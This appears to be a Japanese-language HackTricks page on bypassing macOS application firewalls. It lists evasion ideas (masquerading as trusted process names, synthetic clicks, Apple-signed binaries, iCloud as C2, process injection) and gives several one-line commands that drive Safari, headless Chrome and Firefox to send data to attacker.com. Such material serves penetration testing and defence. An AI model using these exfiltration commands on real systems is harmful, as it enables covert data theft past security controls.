hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

5.3 KiB
Raw Blame History

macOS ファイアウォールのバイパス

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!

HackTricksをサポートする他の方法:

見つかった技術

以下の技術は、いくつかのmacOSファイアウォールアプリで機能していることが確認されています。

ホワイトリスト名の悪用

  • 例えば、launchd のようなmacOSのよく知られたプロセスの名前でマルウェアを呼び出す

シンセティッククリック

  • ファイアウォールがユーザーに許可を求める場合、マルウェアで許可をクリックする

Apple署名済みバイナリの使用

  • curl のようなものですが、whois のような他のものもあります

よく知られたappleドメイン

ファイアウォールは、apple.comicloud.com のようなよく知られたappleドメインへの接続を許可している可能性があります。そしてiCloudはC2として使用できます。

一般的なバイパス

ファイアウォールをバイパスするためのいくつかのアイデア

許可されたトラフィックの確認

許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されているドメインや、それらにアクセスできるアプリケーションを特定するのに役立ちます。

lsof -i TCP -sTCP:ESTABLISHED

DNSの悪用

DNS解決は、おそらくDNSサーバーに接触することが許可される署名されたアプリケーション**mdnsreponder**を介して行われます。

ブラウザアプリ経由

  • osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

プロセスインジェクションを介して

任意のサーバーに接続が許可されているプロセスにコードをインジェクトできれば、ファイアウォールの保護をバイパスできる可能性があります:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

参考文献

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローになる方法を学ぶ

HackTricksをサポートする他の方法